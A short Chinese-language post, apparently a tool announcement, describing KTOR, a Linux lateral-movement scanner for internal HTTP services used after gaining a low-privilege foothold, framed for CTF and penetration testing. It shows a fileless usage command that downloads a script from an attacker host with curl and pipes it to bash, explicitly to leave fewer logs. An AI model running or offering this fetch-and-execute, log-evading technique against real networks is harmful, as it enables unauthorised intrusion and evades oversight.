KTOR:高效的Linux横向移动与无文件落地HTTP服务扫描工具
地址:https://github.com/MartinxMax/KTOR
简介
KTOR 是一款专为 Linux 横向渗透设计的工具。通过该工具,您可以快速扫描内部 HTTP 服务,以便进一步进行网络渗透,且实现无文件落地扫描。
在CTF中通常需要利用本地其他端口HTTP服务或其他主机的HTTP服务来横向移动权限提升。
在获取靶机低权限后通常需要对内部网络进一步探测,而且通过端口转发后再扫描过于耗费时间,为了解决这一缺陷,KTOR来预先探测存在HTTP服务的机器,利用curl命令实现无文件落地扫描,减少日志产生。
使用方法
$ ./ktor.sh -h
扫描本地主机HTTP服务
$ curl http://10.10.16.28/ktor.sh|bash -s -- -l -p all
指定网卡扫描内网HTTP服务
